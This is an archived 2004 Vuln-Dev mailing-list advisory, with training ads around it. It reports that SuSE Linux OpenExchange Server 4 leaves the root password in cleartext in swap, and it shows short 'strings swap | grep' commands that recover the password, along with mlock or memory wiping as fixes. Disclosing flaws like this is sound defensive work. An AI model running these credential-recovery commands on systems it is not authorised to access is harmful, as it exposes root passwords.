Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Linux OpenExchange - cleartext rootpw in swap

from [Rene] Network Security [Permanent Link]
Subject: Linux OpenExchange - cleartext rootpw in swap
Date: 31 Aug 2004 08:11:53 -0000 


date: 31.08.2004
author: l0om   -  l0om [at] excluded dot org - www.excluded.org
discovered in: SuSE Linux Openexchange Server 4
problem: cleartext rootpw in swap caused by fergotten "mlock" or wiping out 
memory


hi,

i have noticed my root password flying around on my swap in cleartext.
an attacker who has successfully rooted a box can get the cleartext password 
from the swap device.  

i dont know if this is caused by some SuSE mistake at the web login- maybe its 
a fault in openldap.
i dont know exactly where this is caused.



root:~ # strings swap -5 | grep GroupwareDBport -A 2|  grep -A 2 
loginDestination
loginDestination
MYROOTCLEARTEXT_PASSWORD
--
--
loginDestination
MYROOTCLEARTEXT_PASSWORD
--
--
loginDestination
MYROOTCLEARTEXT_PASSWORD
[...]


i also had success in getting my cleartext password with

root:~ # strings swap -5 | grep /etc/postfix/main.cf -A 2
/etc/postfix/main.cf
MYROOTCLEARTEXT_PASSWORD
erfolgreich
--
/etc/postfix/main.cf
MYROOTCLEARTEXT_PASSWORD
SIEVEpor
[...]


however- such things can be prevented with wiping out the memory where the
password was stored or with using mlock.


greets @ murfie, johnny, klouw, (other google masters ;]) 
         maximilian, and the guys from excluded.org
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Linux OpenExchange - cleartext rootpw in swap, Rene <=
Previous by Date:  [Full-Disclosure] Axis Network Camera and Video Server Security Advisory, product-security
Next by Date:  Security Center and Windows XP clients in domain, albatross
Previous by Thread:  [Full-Disclosure] Axis Network Camera and Video Server Security Advisory, product-security
Next by Thread:  Security Center and Windows XP clients in domain, albatross
Indexes:  [Date] [Thread] [Top] [All Lists]